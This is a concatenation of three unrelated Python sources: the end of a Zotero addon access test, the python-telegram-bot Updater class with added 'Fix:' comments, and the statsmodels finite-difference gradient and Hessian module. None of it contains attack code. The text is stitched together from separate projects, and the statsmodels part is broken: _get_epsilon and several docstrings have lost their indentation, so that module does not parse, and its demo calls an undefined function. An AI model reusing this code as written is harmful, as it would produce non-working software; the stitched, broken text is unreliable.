            urlparse.urljoin(
                API_URL,
                'users/{}/items'.format(self.account.provider_id)
            ),
            body=mock_responses['documents'],
            content_type='application/json'
        )
        res = self.app.get(
            self.project.api_url_for('zotero_citation_list', zotero_list_id='ROOT'),
            auth=self.user.auth
        )
        # Requesting a specific list id returns that folder's children:
        # sub-folders first, then documents carrying CSL citation data.
        children = res.json['contents']
        assert_equal(len(children), 7)
        assert_equal(children[0]['kind'], 'folder')
        assert_equal(children[1]['kind'], 'file')
        assert_true(children[1].get('csl') is not None)
    @responses.activate
    def test_zotero_citation_list_non_linked_or_child_non_authorizer(self):
        # A contributor who did not authorize the addon may only browse the
        # linked folder and its children; anything else must be forbidden.
        non_authorizing_user = AuthUserFactory()
        self.project.add_contributor(non_authorizing_user, save=True)
        # Link the node to a folder unrelated to 'ROOT'.
        self.node_addon.zotero_list_id = 'e843da05-8818-47c2-8c37-41eebfc4fe3f'
        self.node_addon.save()
        responses.add(
            responses.GET,
            urlparse.urljoin(
                API_URL,
                'users/{}/collections'.format(self.account.provider_id)
            ),
            body=mock_responses['folders'],
            content_type='application/json'
        )
        responses.add(
            responses.GET,
            urlparse.urljoin(
                API_URL,
                'users/{}/items'.format(self.account.provider_id)
            ),
            body=mock_responses['documents'],
            content_type='application/json'
        )
        res = self.app.get(
            self.project.api_url_for('zotero_citation_list', zotero_list_id='ROOT'),
            auth=non_authorizing_user.auth,
            expect_errors=True
        )
        # 'ROOT' is neither the linked list nor one of its children -> 403.
        assert_equal(res.status_code, 403)
| |
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the class Updater, which tries to make creating Telegram bots intuitive."""
import logging
import os
import ssl
import warnings
from threading import Thread, Lock, current_thread, Event
from time import sleep
import subprocess
from signal import signal, SIGINT, SIGTERM, SIGABRT
from queue import Queue
from telegram import Bot, TelegramError
from telegram.ext import Dispatcher, JobQueue
from telegram.error import Unauthorized, InvalidToken, RetryAfter
from telegram.utils.request import Request
from telegram.utils.webhookhandler import (WebhookServer, WebhookHandler)
logging.getLogger(__name__).addHandler(logging.NullHandler())
class Updater(object):
    """
    This class, which employs the :class:`telegram.ext.Dispatcher`, provides a frontend to
    :class:`telegram.Bot` to the programmer, so they can focus on coding the bot. Its purpose is to
    receive the updates from Telegram and to deliver them to said dispatcher. It also runs in a
    separate thread, so the user can interact with the bot, for example on the command line. The
    dispatcher supports handlers for different kinds of data: Updates from Telegram, basic text
    commands and even arbitrary types. The updater can be started as a polling service or, for
    production, use a webhook to receive updates. This is achieved using the WebhookServer and
    WebhookHandler classes.

    Attributes:
        bot (:class:`telegram.Bot`): The bot used with this Updater.
        user_sig_handler (:obj:`signal`): signals the updater will respond to.
        update_queue (:obj:`Queue`): Queue for the updates.
        job_queue (:class:`telegram.ext.JobQueue`): Jobqueue for the updater.
        dispatcher (:class:`telegram.ext.Dispatcher`): Dispatcher that handles the updates and
            dispatches them to the handlers.
        running (:obj:`bool`): Indicates if the updater is running.

    Args:
        token (:obj:`str`, optional): The bot's token given by the @BotFather.
        base_url (:obj:`str`, optional): Base_url for the bot.
        workers (:obj:`int`, optional): Amount of threads in the thread pool for functions
            decorated with ``@run_async``.
        bot (:class:`telegram.Bot`, optional): A pre-initialized bot instance. If a pre-initialized
            bot is used, it is the user's responsibility to create it using a `Request`
            instance with a large enough connection pool.
        user_sig_handler (:obj:`function`, optional): Takes ``signum, frame`` as positional
            arguments. This will be called when a signal is received, defaults are (SIGINT,
            SIGTERM, SIGABRT) setable with :attr:`idle`.
        request_kwargs (:obj:`dict`, optional): Keyword args to control the creation of a request
            object (ignored if `bot` argument is used).

    Note:
        You must supply either a :attr:`bot` or a :attr:`token` argument.

    Raises:
        ValueError: If both :attr:`token` and :attr:`bot` are passed or none of them.
    """

    # Request instance created by the Updater itself (None if a pre-built bot
    # was supplied); only this instance is stopped in stop().
    _request = None

    def __init__(self,
                 token=None,
                 base_url=None,
                 workers=4,
                 bot=None,
                 user_sig_handler=None,
                 request_kwargs=None):
        if (token is None) and (bot is None):
            raise ValueError('`token` or `bot` must be passed')
        if (token is not None) and (bot is not None):
            raise ValueError('`token` and `bot` are mutually exclusive')

        self.logger = logging.getLogger(__name__)

        con_pool_size = workers + 4

        if bot is not None:
            self.bot = bot
            if bot.request.con_pool_size < con_pool_size:
                self.logger.warning(
                    'Connection pool of Request object is smaller than optimal value (%s)',
                    con_pool_size)
        else:
            # we need a connection pool the size of:
            # * for each of the workers
            # * 1 for Dispatcher
            # * 1 for polling Updater (even if webhook is used, we can spare a connection)
            # * 1 for JobQueue
            # * 1 for main thread
            if request_kwargs is None:
                request_kwargs = {}
            if 'con_pool_size' not in request_kwargs:
                request_kwargs['con_pool_size'] = con_pool_size
            self._request = Request(**request_kwargs)
            self.bot = Bot(token, base_url, request=self._request)
        self.user_sig_handler = user_sig_handler
        self.update_queue = Queue()
        self.job_queue = JobQueue(self.bot)
        self.__exception_event = Event()
        self.dispatcher = Dispatcher(
            self.bot,
            self.update_queue,
            job_queue=self.job_queue,
            workers=workers,
            exception_event=self.__exception_event)
        self.last_update_id = 0
        self.running = False
        self.is_idle = False
        self.httpd = None
        self.__lock = Lock()
        self.__threads = []

    def _init_thread(self, target, name, *args, **kwargs):
        # Start a daemon-style worker thread that funnels uncaught exceptions
        # into self.__exception_event via _thread_wrapper.
        thr = Thread(target=self._thread_wrapper, name=name, args=(target,) + args, kwargs=kwargs)
        thr.start()
        self.__threads.append(thr)

    def _thread_wrapper(self, target, *args, **kwargs):
        # Wrapper run inside every thread created by _init_thread: logs start
        # and end, and signals the shared exception event on any failure.
        thr_name = current_thread().name
        self.logger.debug('{0} - started'.format(thr_name))
        try:
            target(*args, **kwargs)
        except Exception:
            self.__exception_event.set()
            self.logger.exception('unhandled exception')
            raise
        self.logger.debug('{0} - ended'.format(thr_name))

    def start_polling(self,
                      poll_interval=0.0,
                      timeout=10,
                      network_delay=None,
                      clean=False,
                      bootstrap_retries=0,
                      read_latency=2.,
                      allowed_updates=None):
        """Starts polling updates from Telegram.

        Args:
            poll_interval (:obj:`float`, optional): Time to wait between polling updates from
                Telegram in seconds. Default is 0.0.
            timeout (:obj:`float`, optional): Passed to :attr:`telegram.Bot.get_updates`.
            clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
                before actually starting to poll. Default is False.
            bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
                `Updater` will retry on failures on the Telegram server.

                * < 0 - retry indefinitely
                *   0 - no retries (default)
                * > 0 - retry up to X times

            allowed_updates (List[:obj:`str`], optional): Passed to
                :attr:`telegram.Bot.get_updates`.
            read_latency (:obj:`float` | :obj:`int`, optional): Grace time in seconds for receiving
                the reply from server. Will be added to the `timeout` value and used as the read
                timeout from server (Default: 2).
            network_delay: Deprecated. Will be honoured as :attr:`read_latency` for a while but
                will be removed in the future.

        Returns:
            :obj:`Queue`: The update queue that can be filled from the main thread.
        """
        if network_delay is not None:
            warnings.warn('network_delay is deprecated, use read_latency instead')
            read_latency = network_delay

        with self.__lock:
            if not self.running:
                self.running = True

                # Create & start threads
                self.job_queue.start()
                self._init_thread(self.dispatcher.start, "dispatcher")
                self._init_thread(self._start_polling, "updater", poll_interval, timeout,
                                  read_latency, bootstrap_retries, clean, allowed_updates)

                # Return the update queue so the main thread can insert updates
                return self.update_queue

    def start_webhook(self,
                      listen='127.0.0.1',
                      port=80,
                      url_path='',
                      cert=None,
                      key=None,
                      clean=False,
                      bootstrap_retries=0,
                      webhook_url=None,
                      allowed_updates=None):
        """
        Starts a small http server to listen for updates via webhook. If cert
        and key are not provided, the webhook will be started directly on
        http://listen:port/url_path, so SSL can be handled by another
        application. Else, the webhook will be started on
        https://listen:port/url_path

        Args:
            listen (:obj:`str`, optional): IP-Address to listen on. Default ``127.0.0.1``.
            port (:obj:`int`, optional): Port the bot should be listening on. Default ``80``.
            url_path (:obj:`str`, optional): Path inside url.
            cert (:obj:`str`, optional): Path to the SSL certificate file.
            key (:obj:`str`, optional): Path to the SSL key file.
            clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
                before actually starting the webhook. Default is ``False``.
            bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
                `Updater` will retry on failures on the Telegram server.

                * < 0 - retry indefinitely
                *   0 - no retries (default)
                * > 0 - retry up to X times

            webhook_url (:obj:`str`, optional): Explicitly specify the webhook url. Useful behind
                NAT, reverse proxy, etc. Default is derived from `listen`, `port` & `url_path`.
            allowed_updates (List[:obj:`str`], optional): Passed to
                :attr:`telegram.Bot.set_webhook`.

        Returns:
            :obj:`Queue`: The update queue that can be filled from the main thread.
        """
        with self.__lock:
            if not self.running:
                self.running = True

                # Create & start threads
                self.job_queue.start()
                # Fix: removed a stray trailing comma that turned this call
                # into building and discarding a 1-tuple.
                self._init_thread(self.dispatcher.start, "dispatcher")
                self._init_thread(self._start_webhook, "updater", listen, port, url_path, cert,
                                  key, bootstrap_retries, clean, webhook_url, allowed_updates)

                # Return the update queue so the main thread can insert updates
                return self.update_queue

    def _start_polling(self, poll_interval, timeout, read_latency, bootstrap_retries, clean,
                       allowed_updates):
        # Thread target of thread 'updater'. Runs in background, pulls
        # updates from Telegram and inserts them in the update queue of the
        # Dispatcher.
        cur_interval = poll_interval
        self.logger.debug('Updater thread started')

        self._bootstrap(bootstrap_retries, clean=clean, webhook_url='', allowed_updates=None)

        while self.running:
            try:
                updates = self.bot.get_updates(
                    self.last_update_id,
                    timeout=timeout,
                    read_latency=read_latency,
                    allowed_updates=allowed_updates)
            except RetryAfter as e:
                # Server asked us to back off for a specific amount of time.
                self.logger.info(str(e))
                cur_interval = 0.5 + e.retry_after
            except TelegramError as te:
                self.logger.error("Error while getting Updates: {0}".format(te))
                # Put the error into the update queue and let the Dispatcher
                # broadcast it
                self.update_queue.put(te)
                cur_interval = self._increase_poll_interval(cur_interval)
            else:
                if not self.running:
                    if len(updates) > 0:
                        self.logger.debug('Updates ignored and will be pulled '
                                          'again on restart.')
                    break
                if updates:
                    for update in updates:
                        self.update_queue.put(update)
                    self.last_update_id = updates[-1].update_id + 1
                cur_interval = poll_interval

            sleep(cur_interval)

    @staticmethod
    def _increase_poll_interval(current_interval):
        # increase waiting times on subsequent errors up to 30secs
        if current_interval == 0:
            current_interval = 1
        elif current_interval < 30:
            current_interval += current_interval / 2
        elif current_interval > 30:
            current_interval = 30
        return current_interval

    def _start_webhook(self, listen, port, url_path, cert, key, bootstrap_retries, clean,
                       webhook_url, allowed_updates):
        # Thread target of thread 'updater': serves updates via a local
        # webhook HTTP(S) server.
        self.logger.debug('Updater thread started')
        use_ssl = cert is not None and key is not None
        if not url_path.startswith('/'):
            url_path = '/{0}'.format(url_path)

        # Create and start server
        self.httpd = WebhookServer((listen, port), WebhookHandler, self.update_queue, url_path,
                                   self.bot)

        if use_ssl:
            self._check_ssl_cert(cert, key)

            # DO NOT CHANGE: Only set webhook if SSL is handled by library
            if not webhook_url:
                webhook_url = self._gen_webhook_url(listen, port, url_path)

            # Fix: open the certificate in a context manager so the file
            # handle is closed after bootstrapping instead of being leaked.
            with open(cert, 'rb') as cert_file:
                self._bootstrap(
                    max_retries=bootstrap_retries,
                    clean=clean,
                    webhook_url=webhook_url,
                    cert=cert_file,
                    allowed_updates=allowed_updates)
        elif clean:
            self.logger.warning("cleaning updates is not supported if "
                                "SSL-termination happens elsewhere; skipping")

        self.httpd.serve_forever(poll_interval=1)

    def _check_ssl_cert(self, cert, key):
        # Check SSL-Certificate with openssl, if possible, then wrap the
        # server socket with SSL.
        try:
            # Fix: use subprocess.DEVNULL instead of a never-closed
            # open(os.devnull, 'wb') file handle.
            exit_code = subprocess.call(
                ["openssl", "x509", "-text", "-noout", "-in", cert],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.STDOUT)
        except OSError:
            # openssl binary not available: skip validation.
            exit_code = 0

        # Fix: compare ints with ==, not the identity operator `is`.
        if exit_code == 0:
            try:
                self.httpd.socket = ssl.wrap_socket(
                    self.httpd.socket, certfile=cert, keyfile=key, server_side=True)
            except ssl.SSLError as error:
                self.logger.exception('Failed to init SSL socket')
                raise TelegramError(str(error))
        else:
            raise TelegramError('SSL Certificate invalid')

    @staticmethod
    def _gen_webhook_url(listen, port, url_path):
        # Derive the public webhook URL from the server bind parameters.
        return 'https://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)

    def _bootstrap(self, max_retries, clean, webhook_url, allowed_updates, cert=None):
        # Register (or clear, when webhook_url == '') the webhook on the
        # Telegram side, retrying transient server errors up to max_retries.
        retries = 0
        while True:
            try:
                if clean:
                    # Disable webhook for cleaning
                    self.bot.delete_webhook()
                    self._clean_updates()
                    sleep(1)
                self.bot.set_webhook(
                    url=webhook_url, certificate=cert, allowed_updates=allowed_updates)
            except (Unauthorized, InvalidToken):
                # Credential problems are fatal; never retry these.
                raise
            except TelegramError:
                msg = 'error in bootstrap phase; try={0} max_retries={1}'.format(retries,
                                                                                 max_retries)
                if max_retries < 0 or retries < max_retries:
                    self.logger.warning(msg)
                    retries += 1
                else:
                    self.logger.exception(msg)
                    raise
            else:
                break
            sleep(1)

    def _clean_updates(self):
        # Drain all pending updates from the Telegram server.
        self.logger.debug('Cleaning updates from Telegram server')
        updates = self.bot.get_updates()
        while updates:
            updates = self.bot.get_updates(updates[-1].update_id + 1)

    def stop(self):
        """Stops the polling/webhook thread, the dispatcher and the job queue."""
        self.job_queue.stop()
        with self.__lock:
            if self.running or self.dispatcher.has_running_threads:
                self.logger.debug('Stopping Updater and Dispatcher...')

                self.running = False

                self._stop_httpd()
                self._stop_dispatcher()
                self._join_threads()
                # Stop the Request instance only if it was created by the Updater
                if self._request:
                    self._request.stop()

    def _stop_httpd(self):
        if self.httpd:
            self.logger.debug('Waiting for current webhook connection to be '
                              'closed... Send a Telegram message to the bot to exit '
                              'immediately.')
            self.httpd.shutdown()
            self.httpd = None

    def _stop_dispatcher(self):
        self.logger.debug('Requesting Dispatcher to stop...')
        self.dispatcher.stop()

    def _join_threads(self):
        for thr in self.__threads:
            self.logger.debug('Waiting for {0} thread to end'.format(thr.name))
            thr.join()
            self.logger.debug('{0} thread has ended'.format(thr.name))
        self.__threads = []

    def signal_handler(self, signum, frame):
        # Installed by idle(); performs a graceful stop on the first signal,
        # or a hard exit if the updater is not running.
        self.is_idle = False
        if self.running:
            self.stop()
            if self.user_sig_handler:
                self.user_sig_handler(signum, frame)
        else:
            self.logger.warning('Exiting immediately!')
            # Fix: `os` is already imported at module level; the redundant
            # local import was removed.
            os._exit(1)

    def idle(self, stop_signals=(SIGINT, SIGTERM, SIGABRT)):
        """Blocks until one of the signals are received and stops the updater.

        Args:
            stop_signals (:obj:`iterable`): Iterable containing signals from the signal module that
                should be subscribed to. Updater.stop() will be called on receiving one of those
                signals. Defaults to (``SIGINT``, ``SIGTERM``, ``SIGABRT``).
        """
        for sig in stop_signals:
            signal(sig, self.signal_handler)

        self.is_idle = True

        while self.is_idle:
            sleep(1)
| |
"""numerical differentiation function, gradient, Jacobian, and Hessian
Author : josef-pkt
License : BSD
Notes
-----
These are simple forward differentiation, so that we have them available
without dependencies.
* Jacobian should be faster than numdifftools because it doesn't use loop over
observations.
* numerical precision will vary and depend on the choice of stepsizes
"""
# TODO:
# * some cleanup
# * check numerical accuracy (and bugs) with numdifftools and analytical
# derivatives
# - linear least squares case: (hess - 2*X'X) is 1e-8 or so
# - gradient and Hessian agree with numdifftools when evaluated away from
# minimum
# - forward gradient, Jacobian evaluated at minimum is inaccurate, centered
# (+/- epsilon) is ok
# * dot product of Jacobian is different from Hessian, either wrong example or
# a bug (unlikely), or a real difference
#
#
# What are the conditions that Jacobian dotproduct and Hessian are the same?
#
# See also:
#
# BHHH: Greene p481 17.4.6, MLE Jacobian = d loglike / d beta , where loglike
# is vector for each observation
# see also example 17.4 when J'J is very different from Hessian
# also does it hold only at the minimum, what's relationship to covariance
# of Jacobian matrix
# http://projects.scipy.org/scipy/ticket/1157
# http://en.wikipedia.org/wiki/Levenberg%E2%80%93Marquardt_algorithm
# objective: sum((y-f(beta,x)**2), Jacobian = d f/d beta
# and not d objective/d beta as in MLE Greene
# similar: http://crsouza.blogspot.com/2009/11/neural-network-learning-by-levenberg_18.html#hessian
#
# in example: if J = d x*beta / d beta then J'J == X'X
# similar to http://en.wikipedia.org/wiki/Levenberg%E2%80%93Marquardt_algorithm
from __future__ import print_function
from statsmodels.compat.python import range
import numpy as np
# NOTE: we only do double precision internally so far
EPS = np.MachAr().eps
_hessian_docs = """
Calculate Hessian with finite difference derivative approximation
Parameters
----------
x : array_like
value at which function derivative is evaluated
f : function
function of one array f(x, `*args`, `**kwargs`)
epsilon : float or array-like, optional
Stepsize used, if None, then stepsize is automatically chosen
according to EPS**(1/%(scale)s)*x.
args : tuple
Arguments for function `f`.
kwargs : dict
Keyword arguments for function `f`.
%(extra_params)s
Returns
-------
hess : ndarray
array of partial second derivatives, Hessian
%(extra_returns)s
Notes
-----
Equation (%(equation_number)s) in Ridout. Computes the Hessian as::
%(equation)s
where e[j] is a vector with element j == 1 and the rest are zero and
d[i] is epsilon[i].
References
----------:
Ridout, M.S. (2009) Statistical applications of the complex-step method
of numerical differentiation. The American Statistician, 63, 66-74
"""
def _get_epsilon(x, s, epsilon, n):
if epsilon is None:
h = EPS**(1. / s) * np.maximum(np.abs(x), 0.1)
else:
if np.isscalar(epsilon):
h = np.empty(n)
h.fill(epsilon)
else: # pragma : no cover
h = np.asarray(epsilon)
if h.shape != x.shape:
raise ValueError("If h is not a scalar it must have the same"
" shape as x.")
return h
def approx_fprime(x, f, epsilon=None, args=(), kwargs={}, centered=False):
    '''
    Gradient of function, or Jacobian if function f returns 1d array

    Parameters
    ----------
    x : array
        parameters at which the derivative is evaluated
    f : function
        `f(*((x,)+args), **kwargs)` returning either one value or 1d array
    epsilon : float, optional
        Stepsize, if None, optimal stepsize is used. This is EPS**(1/2)*x for
        `centered` == False and EPS**(1/3)*x for `centered` == True.
    args : tuple
        Tuple of additional arguments for function `f`.
    kwargs : dict
        Dictionary of additional keyword arguments for function `f`.
    centered : bool
        Whether central difference should be returned. If not, does forward
        differencing.

    Returns
    -------
    grad : array
        gradient or Jacobian

    Notes
    -----
    If f returns a 1d array, it returns a Jacobian. If a 2d array is returned
    by f (e.g., with a value for each observation), it returns a 3d array
    with the Jacobian of each observation with shape xk x nobs x xk. I.e.,
    the Jacobian of the first observation would be [:, 0, :]
    '''
    n = len(x)
    f0 = f(*((x,) + args), **kwargs)
    # f0 may be scalar or array; shape of the output follows from it.
    dim = np.atleast_1d(f0).shape
    grad = np.zeros((n,) + dim, float)
    ei = np.zeros((n,), float)
    if centered:
        # Central differences: half-step in each direction.
        epsilon = _get_epsilon(x, 3, epsilon, n) / 2.
        for k in range(n):
            ei[k] = epsilon[k]
            f_plus = f(*((x + ei,) + args), **kwargs)
            f_minus = f(*((x - ei,) + args), **kwargs)
            grad[k, :] = (f_plus - f_minus) / (2 * epsilon[k])
            ei[k] = 0.0
    else:
        # Forward differences relative to the base evaluation f0.
        epsilon = _get_epsilon(x, 2, epsilon, n)
        for k in range(n):
            ei[k] = epsilon[k]
            grad[k, :] = (f(*((x + ei,) + args), **kwargs) - f0) / epsilon[k]
            ei[k] = 0.0
    return grad.squeeze().T
def approx_fprime_cs(x, f, epsilon=None, args=(), kwargs={}):
    '''
    Calculate gradient or Jacobian with complex step derivative approximation

    Parameters
    ----------
    x : array
        parameters at which the derivative is evaluated
    f : function
        `f(*((x,)+args), **kwargs)` returning either one value or 1d array
    epsilon : float, optional
        Stepsize, if None, optimal stepsize is used. Optimal step-size is
        EPS*x. See note.
    args : tuple
        Tuple of additional arguments for function `f`.
    kwargs : dict
        Dictionary of additional keyword arguments for function `f`.

    Returns
    -------
    partials : ndarray
        array of partial derivatives, Gradient or Jacobian

    Notes
    -----
    The complex-step derivative has truncation error O(epsilon**2), so
    truncation error can be eliminated by choosing epsilon to be very small.
    The complex-step derivative avoids the problem of round-off error with
    small epsilon because there is no subtraction.
    '''
    # From Guilherme P. de Freitas, numpy mailing list
    # May 04 2010 thread "Improvement of performance"
    # http://mail.scipy.org/pipermail/numpy-discussion/2010-May/050250.html
    n = len(x)
    epsilon = _get_epsilon(x, 1, epsilon, n)
    # One purely imaginary perturbation per coordinate.
    increments = np.identity(n) * 1j * epsilon
    # TODO: see if this can be vectorized, but usually dim is small
    partials = []
    for i, ih in enumerate(increments):
        partials.append(f(x + ih, *args, **kwargs).imag / epsilon[i])
    return np.array(partials).T
def approx_hess_cs(x, f, epsilon=None, args=(), kwargs={}):
    '''Calculate Hessian with complex-step derivative approximation

    Parameters
    ----------
    x : array_like
        value at which function derivative is evaluated
    f : function
        function of one array f(x)
    epsilon : float
        stepsize, if None, then stepsize is automatically chosen

    Returns
    -------
    hess : ndarray
        array of partial second derivatives, Hessian

    Notes
    -----
    based on equation 10 in
    M. S. RIDOUT: Statistical Applications of the Complex-step Method
    of Numerical Differentiation, University of Kent, Canterbury, Kent, U.K.

    The stepsize is the same for the complex and the finite difference part.
    '''
    # TODO: might want to consider lowering the step for pure derivatives
    n = len(x)
    h = _get_epsilon(x, 3, epsilon, n)
    ee = np.diag(h)
    # hess starts as the denominator matrix epsilon_i * epsilon_j and is
    # overwritten entry by entry with the Hessian values.
    hess = np.outer(h, h)
    for i in range(n):
        for j in range(i, n):
            f_plus = f(*((x + 1j * ee[i, :] + ee[j, :],) + args), **kwargs)
            f_minus = f(*((x + 1j * ee[i, :] - ee[j, :],) + args), **kwargs)
            hess[i, j] = (f_plus - f_minus).imag / 2. / hess[i, j]
            hess[j, i] = hess[i, j]
    return hess
approx_hess_cs.__doc__ = (("Calculate Hessian with complex-step derivative "
"approximation\n") +
"\n".join(_hessian_docs.split("\n")[1:]) %
dict(scale="3", extra_params="",
extra_returns="", equation_number="10",
equation=("1/(2*d_j*d_k) * "
"imag(f(x + i*d[j]*e[j] + "
"d[k]*e[k]) -\n"
" "
"f(x + i*d[j]*e[j] - d[k]*e[k]))\n"))
)
def approx_hess1(x, f, epsilon=None, args=(), kwargs={}, return_grad=False):
    """Forward-difference Hessian (Ridout eq. 7); optionally also the gradient."""
    n = len(x)
    h = _get_epsilon(x, 3, epsilon, n)
    ee = np.diag(h)

    f0 = f(*((x,) + args), **kwargs)
    # Single forward-step evaluations, one per coordinate.
    g = np.zeros(n)
    for i in range(n):
        g[i] = f(*((x + ee[i, :],) + args), **kwargs)

    hess = np.outer(h, h)  # denominators epsilon_i * epsilon_j
    # Double forward-step evaluations over coordinate pairs.
    for i in range(n):
        for j in range(i, n):
            f_ij = f(*((x + ee[i, :] + ee[j, :],) + args), **kwargs)
            hess[i, j] = (f_ij - g[i] - g[j] + f0) / hess[i, j]
            hess[j, i] = hess[i, j]

    if not return_grad:
        return hess
    grad = (g - f0) / h
    return hess, grad
approx_hess1.__doc__ = _hessian_docs % dict(scale="3",
extra_params="""return_grad : bool
Whether or not to also return the gradient
""",
extra_returns="""grad : nparray
Gradient if return_grad == True
""",
equation_number="7",
equation="""1/(d_j*d_k) * ((f(x + d[j]*e[j] + d[k]*e[k]) - f(x + d[j]*e[j])))
""")
def approx_hess2(x, f, epsilon=None, args=(), kwargs={}, return_grad=False):
    """Symmetrized forward/backward-difference Hessian (Ridout eq. 8)."""
    n = len(x)
    # NOTE: ridout suggesting using eps**(1/4)*theta
    h = _get_epsilon(x, 3, epsilon, n)
    ee = np.diag(h)

    f0 = f(*((x,) + args), **kwargs)
    # Single forward (g) and backward (gg) step evaluations per coordinate.
    g = np.zeros(n)
    gg = np.zeros(n)
    for i in range(n):
        g[i] = f(*((x + ee[i, :],) + args), **kwargs)
        gg[i] = f(*((x - ee[i, :],) + args), **kwargs)

    hess = np.outer(h, h)  # denominators epsilon_i * epsilon_j
    # Double steps in both directions, averaged.
    for i in range(n):
        for j in range(i, n):
            f_pp = f(*((x + ee[i, :] + ee[j, :],) + args), **kwargs)
            f_mm = f(*((x - ee[i, :] - ee[j, :],) + args), **kwargs)
            hess[i, j] = (f_pp - g[i] - g[j] + f0 +
                          f_mm - gg[i] - gg[j] + f0) / (2 * hess[i, j])
            hess[j, i] = hess[i, j]

    if not return_grad:
        return hess
    grad = (g - f0) / h
    return hess, grad
approx_hess2.__doc__ = _hessian_docs % dict(scale="3",
extra_params="""return_grad : bool
Whether or not to also return the gradient
""",
extra_returns="""grad : nparray
Gradient if return_grad == True
""",
equation_number="8",
equation = """1/(2*d_j*d_k) * ((f(x + d[j]*e[j] + d[k]*e[k]) - f(x + d[j]*e[j])) -
(f(x + d[k]*e[k]) - f(x)) +
(f(x - d[j]*e[j] - d[k]*e[k]) - f(x + d[j]*e[j])) -
(f(x - d[k]*e[k]) - f(x)))
""")
def approx_hess3(x, f, epsilon=None, args=(), kwargs={}):
    """Central-difference Hessian (Ridout eq. 9).

    Evaluates f at the four corners (+/-d_i, +/-d_j) for each coordinate
    pair and divides by 4*d_i*d_j.
    """
    n = len(x)
    h = _get_epsilon(x, 4, epsilon, n)
    ee = np.diag(h)
    hess = np.outer(h, h)  # denominators epsilon_i * epsilon_j

    for i in range(n):
        for j in range(i, n):
            # BUG FIX: the original had a stray trailing comma that wrapped
            # the fourth function value in a 1-tuple, so the subtraction
            # raised TypeError at runtime. The term must be a plain number.
            hess[i, j] = (f(*((x + ee[i, :] + ee[j, :],) + args), **kwargs)
                          - f(*((x + ee[i, :] - ee[j, :],) + args), **kwargs)
                          - (f(*((x - ee[i, :] + ee[j, :],) + args), **kwargs)
                             - f(*((x - ee[i, :] - ee[j, :],) + args), **kwargs))
                          ) / (4. * hess[i, j])
            hess[j, i] = hess[i, j]
    return hess
approx_hess3.__doc__ = _hessian_docs % dict(scale="4", extra_params="",
extra_returns="",
equation_number="9",
equation = """1/(4*d_j*d_k) * ((f(x + d[j]*e[j] + d[k]*e[k]) - f(x + d[j]*e[j]
- d[k]*e[k])) -
(f(x - d[j]*e[j] + d[k]*e[k]) - f(x - d[j]*e[j]
- d[k]*e[k]))""")
approx_hess = approx_hess3
approx_hess.__doc__ += "\n This is an alias for approx_hess3"
if __name__ == '__main__': #pragma : no cover
    # Ad-hoc demo comparing the finite-difference helpers above against an
    # analytic least-squares case and (optionally) numdifftools.
    import statsmodels.api as sm
    from scipy.optimize.optimize import approx_fhess_p
    import numpy as np

    data = sm.datasets.spector.load()
    data.exog = sm.add_constant(data.exog, prepend=False)
    mod = sm.Probit(data.endog, data.exog)
    res = mod.fit(method="newton")
    test_params = [1,0.25,1.4,-7]
    llf = mod.loglike
    score = mod.score
    hess = mod.hessian

    # below is Josef's scratch work
    # NOTE(review): approx_fprime_cs has no `h` keyword; this helper would
    # raise TypeError if called — confirm intended signature.
    def approx_hess_cs_old(x, func, args=(), h=1.0e-20, epsilon=1e-6):
        def grad(x):
            return approx_fprime_cs(x, func, args=args, h=1.0e-20)

        #Hessian from gradient:
        return (approx_fprime(x, grad, epsilon)
                + approx_fprime(x, grad, -epsilon))/2.

    def fun(beta, x):
        return np.dot(x, beta).sum(0)

    def fun1(beta, y, x):
        #print(beta.shape, x.shape)
        xb = np.dot(x, beta)
        return (y-xb)**2 #(xb-xb.mean(0))**2

    def fun2(beta, y, x):
        #print(beta.shape, x.shape)
        return fun1(beta, y, x).sum(0)

    # Synthetic linear-model data: y = x @ beta + noise.
    nobs = 200
    x = np.arange(nobs*3).reshape(nobs,-1)
    x = np.random.randn(nobs,3)
    xk = np.array([1,2,3])
    xk = np.array([1.,1.,1.])
    #xk = np.zeros(3)
    beta = xk
    y = np.dot(x, beta) + 0.1*np.random.randn(nobs)
    xk = np.dot(np.linalg.pinv(x),y)

    epsilon = 1e-6
    args = (y,x)
    from scipy import optimize
    xfmin = optimize.fmin(fun2, (0,0,0), args)
    print(approx_fprime((1,2,3),fun,epsilon,x))
    jac = approx_fprime(xk,fun1,epsilon,args)
    jacmin = approx_fprime(xk,fun1,-epsilon,args)
    #print(jac)
    print(jac.sum(0))
    print('\nnp.dot(jac.T, jac)')
    print(np.dot(jac.T, jac))
    print('\n2*np.dot(x.T, x)')
    print(2*np.dot(x.T, x))
    jac2 = (jac+jacmin)/2.
    print(np.dot(jac2.T, jac2))

    #he = approx_hess(xk,fun2,epsilon,*args)
    # NOTE(review): `approx_hess_old` is not defined in this module (only
    # approx_hess_cs_old above) — these calls would raise NameError; the demo
    # appears to predate a rename. Verify before running.
    print(approx_hess_old(xk,fun2,1e-3,args))
    he = approx_hess_old(xk,fun2,None,args)
    print('hessfd')
    print(he)
    print('epsilon =', None)
    print(he[0] - 2*np.dot(x.T, x))
    for eps in [1e-3,1e-4,1e-5,1e-6]:
        print('eps =', eps)
        print(approx_hess_old(xk,fun2,eps,args)[0] - 2*np.dot(x.T, x))

    # Compare complex-step and central-difference Hessians against the
    # analytic value 2*X'X for the least-squares objective.
    hcs2 = approx_hess_cs(xk,fun2,args=args)
    print('hcs2')
    print(hcs2 - 2*np.dot(x.T, x))

    hfd3 = approx_hess(xk,fun2,args=args)
    print('hfd3')
    print(hfd3 - 2*np.dot(x.T, x))

    import numdifftools as nd
    hnd = nd.Hessian(lambda a: fun2(a, y, x))
    hessnd = hnd(xk)
